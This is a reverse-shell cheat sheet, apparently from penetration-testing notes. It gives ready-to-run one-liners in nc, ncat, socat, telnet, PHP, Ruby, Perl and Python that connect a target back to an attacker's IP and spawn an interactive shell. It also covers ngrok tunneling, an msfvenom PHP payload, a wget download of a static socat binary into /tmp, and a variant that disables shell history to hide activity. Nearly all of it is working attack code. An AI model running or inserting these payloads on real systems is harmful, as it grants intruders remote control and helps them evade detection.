Skip to content

REVERSE SHELL

Resources

https://alamot.github.io/reverse_shells/

https://github.com/ShutdownRepo/shellerator

Basics / Classical

Reverse shell:
nc -nv IP 443 -e /bin/bash
ncat --udp IP 443 -e /bin/bash

OR

/bin/sh | nc ATTACKING-IP 443

OR

rm -f /tmp/x; mknod /tmp/x p && nc <IP> <PORT> 0</tmp/x | /bin/bash 1>/tmp/x 
rm -f /tmp/x; mknod /tmp/x p && /bin/nc.openbsd <IP> <PORT> 0</tmp/x | /bin/bash 1>/tmp/x

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> > /tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc.openbsd <IP> <PORT> > /tmp/f

OR

/bin/nc.traditional <IP> <PORT> -e /bin/bash 
/bin/nc.traditional <IP> <PORT> -c /bin/bash

# Socat reverse shell allow to have TTY

# Attacker machine
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Target machine
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod+x/tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sanetcp:100.100.100.100:4444

Reverse shell using ngrok

# On attacker (term1)
ngrok tcp 12345

# On attacker (term2)
nc -lvp 12345

# On target, use your reverse shell payload on the ngrok tunnel target
nc 0.tcp.ngrok.io <port> -e /bin/sh

## PHP Reverse Shell 

php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

# Using msfvenom
msfvenom -p php/shell/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.php

#You can also use the php reverse shell with a complete handler by pentest-monkey, available in Kali by default

Telnet

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

OR

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet <IP> <PORT> > f
rm -f x; mknod x p && telnet <IP> <PORT> 0<x | /bin/bash 1>x

(Listen on the port 443 machine)

Ruby

# Linux
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<IP>",<PORT>);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("<IP>",<PORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Windows
ruby -rsocket -e "c=TCPSocket.new('<IP>',<PORT>);while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"

Perl

# Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# Linux
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))\
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");\
open(STDERR,">&S");exec("/bin/sh -i");};'

Python

#!/usr/bin/env python
import socket,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.179",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.system("/bin/sh -i")

OR

python -c “import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('IP',443));\
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.system('/bin/sh -i')”

# UDP
python -c 'import socket,pty,os;lhost = "IP"; lport = 100;\
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport));\
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);\
os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close();'

# Python PTY Shells python-pty-shells
# Can be very good 
simpleHTTPServer
wget ... -O /dev/shm/.rev.py
python tcp_pty_shell_handler -b ip:port